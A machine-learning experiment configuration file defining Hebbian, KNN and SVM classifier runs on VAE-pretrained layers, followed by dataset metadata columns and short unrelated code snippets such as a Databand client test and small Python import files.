P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: l2_penalties[ds],
P.KEY_DROPOUT_P: 0.5,
}
hebb_fc_on_vae_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
hebb_fc_on_vae_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_vae_layer_ft[' + str(l) + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
prec_on_vae_layer_ft[str(l) + '_' + ds + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None,
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 1,
P.KEY_CRIT_METRIC_MANAGER: 'neurolab.optimization.metric.PrecMetricManager',
P.KEY_SKCLF_NUM_SAMPLES: tot_trn_samples[ds],
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: samples_per_class[ds],
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_vae_layer_ft[' + str(l) + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_vae_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_vae_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_vae_layer_ft[' + str(l) + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_vae_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_vae_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_vae_layer_ft[' + str(l) + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
| 56.8241
| 227
| 0.685012
| 6,316
| 41,027
| 4.080114
| 0.021374
| 0.098099
| 0.023283
| 0.029104
| 0.989212
| 0.97889
| 0.974544
| 0.974078
| 0.972604
| 0.972604
| 0
| 0.01383
| 0.169888
| 41,027
| 722
| 228
| 56.8241
| 0.742843
| 0
| 0
| 0.849508
| 0
| 0
| 0.246588
| 0.193478
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.040788
| 0.004219
| 0
| 0.004219
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbeec8ca4f758ff47753b0d103d1a94986732d93
| 122
|
py
|
Python
|
churnmodels/schema/__init__.py
|
ypix/fight-churn-nb
|
fcaaf17a30d69851be42a54c0e68ca4444fb97e1
|
[
"MIT"
] | null | null | null |
churnmodels/schema/__init__.py
|
ypix/fight-churn-nb
|
fcaaf17a30d69851be42a54c0e68ca4444fb97e1
|
[
"MIT"
] | null | null | null |
churnmodels/schema/__init__.py
|
ypix/fight-churn-nb
|
fcaaf17a30d69851be42a54c0e68ca4444fb97e1
|
[
"MIT"
] | null | null | null |
from .models import *
from .model_rfl import _howto_do_it as reflect_db
from .model_rfl import get_schema_rfl, get_db_uri
| 30.5
| 49
| 0.836066
| 23
| 122
| 4
| 0.608696
| 0.195652
| 0.26087
| 0.391304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122951
| 122
| 3
| 50
| 40.666667
| 0.859813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0208c024b891c030cd44e2cbb5f18d29a101441d
| 6,911
|
py
|
Python
|
modules/dbnd/test_dbnd/api/test_databand_client.py
|
dmytrostriletskyi/dbnd
|
d4a5f5167523e80439c9d64182cdc87b40cbc48f
|
[
"Apache-2.0"
] | null | null | null |
modules/dbnd/test_dbnd/api/test_databand_client.py
|
dmytrostriletskyi/dbnd
|
d4a5f5167523e80439c9d64182cdc87b40cbc48f
|
[
"Apache-2.0"
] | null | null | null |
modules/dbnd/test_dbnd/api/test_databand_client.py
|
dmytrostriletskyi/dbnd
|
d4a5f5167523e80439c9d64182cdc87b40cbc48f
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from mock import MagicMock, patch
from dbnd.api.databand_client import DatabandClient
@pytest.fixture
def databand_client():
return DatabandClient.build_databand_client()
@patch("dbnd.api.databand_client.DatabandClient.get_run_info")
def test_get_first_task_run_error(mock_get_run_info, databand_client):
mock_get_run_info.return_value = {
"task_runs": [
{
"latest_error": {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
},
"latest_task_run_attempt": {
"timestamp": "2021-08-31T16:30:40.760066+00:00",
"start_date": "2021-08-31T16:30:39.792293+00:00",
"end_date": "2021-08-31T16:30:40.760066+00:00",
"latest_error": {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
},
},
},
],
"run_uid": "bf57cba2-0a78-11ec-b5ea-acde48001122",
}
actual = databand_client.get_first_task_run_error("mock-run-uid")
expected = {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
}
assert actual == expected
@patch("dbnd.api.databand_client.DatabandClient.get_run_info")
def test_get_first_task_run_error_with_no_end_date(mock_get_run_info, databand_client):
mock_get_run_info.return_value = {
"task_runs": [
{
"latest_error": {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
},
"latest_task_run_attempt": {
"timestamp": "2021-08-31T16:30:40.760066+00:00",
"start_date": "2021-08-31T16:30:39.792293+00:00",
"end_date": None,
"latest_error": {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
},
},
},
],
"run_uid": "bf57cba2-0a78-11ec-b5ea-acde48001122",
}
actual = databand_client.get_first_task_run_error("mock-run-uid")
expected = None
assert actual == expected
| 74.311828
| 399
| 0.644625
| 975
| 6,911
| 4.330256
| 0.100513
| 0.051397
| 0.039081
| 0.049739
| 0.949076
| 0.949076
| 0.949076
| 0.949076
| 0.943155
| 0.943155
| 0
| 0.066579
| 0.230647
| 6,911
| 92
| 400
| 75.119565
| 0.727478
| 0
| 0
| 0.702381
| 0
| 0.119048
| 0.676458
| 0.339604
| 0
| 0
| 0
| 0
| 0.02381
| 1
| 0.035714
| false
| 0
| 0.035714
| 0.011905
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
02539be657cf06f0346f5baa8ee93c46c66f1301
| 57
|
py
|
Python
|
pythonversion.py
|
bjoffficial/Python
|
73e6fdc19a1bec18488405c4a60c30ba68581ce5
|
[
"Apache-2.0"
] | null | null | null |
pythonversion.py
|
bjoffficial/Python
|
73e6fdc19a1bec18488405c4a60c30ba68581ce5
|
[
"Apache-2.0"
] | null | null | null |
pythonversion.py
|
bjoffficial/Python
|
73e6fdc19a1bec18488405c4a60c30ba68581ce5
|
[
"Apache-2.0"
] | null | null | null |
import sys
print(sys.version)
print(sys.version_info)
| 14.25
| 24
| 0.77193
| 9
| 57
| 4.777778
| 0.555556
| 0.372093
| 0.697674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122807
| 57
| 3
| 25
| 19
| 0.86
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
027f0e6db8094c5bdf1fe7b34fd2475508d8a18d
| 225
|
py
|
Python
|
examples/CooperativeSearch/psaltlib/Outputs/__init__.py
|
GaloisInc/salty
|
f410659b3399ad7c527513e67b06dff0332d823e
|
[
"BSD-3-Clause"
] | 13
|
2017-02-15T21:56:46.000Z
|
2022-03-23T12:59:26.000Z
|
examples/CooperativeSearch/psaltlib/Outputs/__init__.py
|
GaloisInc/salty
|
f410659b3399ad7c527513e67b06dff0332d823e
|
[
"BSD-3-Clause"
] | 17
|
2016-07-21T10:47:23.000Z
|
2020-08-07T13:26:21.000Z
|
examples/CooperativeSearch/psaltlib/Outputs/__init__.py
|
GaloisInc/salty
|
f410659b3399ad7c527513e67b06dff0332d823e
|
[
"BSD-3-Clause"
] | 2
|
2019-06-11T11:59:40.000Z
|
2022-02-09T12:48:39.000Z
|
from psaltlib.Outputs.reg1 import *
from psaltlib.Outputs.Search2 import *
from psaltlib.Outputs.Track import *
from psaltlib.Outputs.Search1 import *
from psaltlib.Outputs.reg2 import *
from psaltlib.Outputs.Return import *
| 32.142857
| 38
| 0.813333
| 30
| 225
| 6.1
| 0.333333
| 0.393443
| 0.622951
| 0.68306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019901
| 0.106667
| 225
| 6
| 39
| 37.5
| 0.890547
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
65efdf9fd15676c79a94685e56259780ecaf0387
| 234
|
py
|
Python
|
python/anyascii/_data/_11f.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_11f.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_11f.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
b=' yh $ $ $ $'
| 234
| 234
| 0.012821
| 2
| 234
| 1.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.957265
| 234
| 1
| 234
| 234
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0.978723
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a0d944420bd3b1fb4f6346dfa3d61d59ac8e537
| 98
|
py
|
Python
|
sourcecode/configs/__init__.py
|
JulianJuaner/VecFontTransfer
|
266b969878cdecc821d1d6e240e87d4caa151d84
|
[
"MIT"
] | 7
|
2021-04-12T10:48:14.000Z
|
2021-12-26T10:17:18.000Z
|
sourcecode/configs/__init__.py
|
JulianJuaner/VecFontTransfer
|
266b969878cdecc821d1d6e240e87d4caa151d84
|
[
"MIT"
] | null | null | null |
sourcecode/configs/__init__.py
|
JulianJuaner/VecFontTransfer
|
266b969878cdecc821d1d6e240e87d4caa151d84
|
[
"MIT"
] | null | null | null |
from sourcecode.configs.make_cfg import make_config
from sourcecode.configs.options import Options
| 49
| 51
| 0.887755
| 14
| 98
| 6.071429
| 0.571429
| 0.329412
| 0.494118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 98
| 2
| 52
| 49
| 0.934066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a0f1fb69ebbcac90e007c3bc038dca6612d910e
| 48
|
py
|
Python
|
csrf/__init__.py
|
golightlyb/csrf.py
|
a182e0d6f37228f4488cbce186e0f6f132e6300c
|
[
"FSFAP"
] | 5
|
2018-07-28T22:57:24.000Z
|
2021-06-23T23:31:24.000Z
|
csrf/__init__.py
|
golightlyb/csrf.py
|
a182e0d6f37228f4488cbce186e0f6f132e6300c
|
[
"FSFAP"
] | null | null | null |
csrf/__init__.py
|
golightlyb/csrf.py
|
a182e0d6f37228f4488cbce186e0f6f132e6300c
|
[
"FSFAP"
] | 1
|
2020-01-10T10:57:04.000Z
|
2020-01-10T10:57:04.000Z
|
from .csrf import check, generate, valid, Error
| 24
| 47
| 0.770833
| 7
| 48
| 5.285714
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 48
| 1
| 48
| 48
| 0.902439
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a3fb9714abdb3d202fe4f977615c77df0a0ad7e
| 49
|
py
|
Python
|
wolfgang/mozart.py
|
yoon-gu/cicd
|
c7bb44ec7e835be350f49d412f91a0ae34df8c65
|
[
"MIT"
] | null | null | null |
wolfgang/mozart.py
|
yoon-gu/cicd
|
c7bb44ec7e835be350f49d412f91a0ae34df8c65
|
[
"MIT"
] | 1
|
2021-09-11T13:22:50.000Z
|
2021-09-11T13:22:50.000Z
|
wolfgang/mozart.py
|
yoon-gu/cicd
|
c7bb44ec7e835be350f49d412f91a0ae34df8c65
|
[
"MIT"
] | null | null | null |
import sys
import os
def main():
print("hello")
| 9.8
| 15
| 0.693878
| 8
| 49
| 4.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 49
| 5
| 15
| 9.8
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0.1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0.25
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
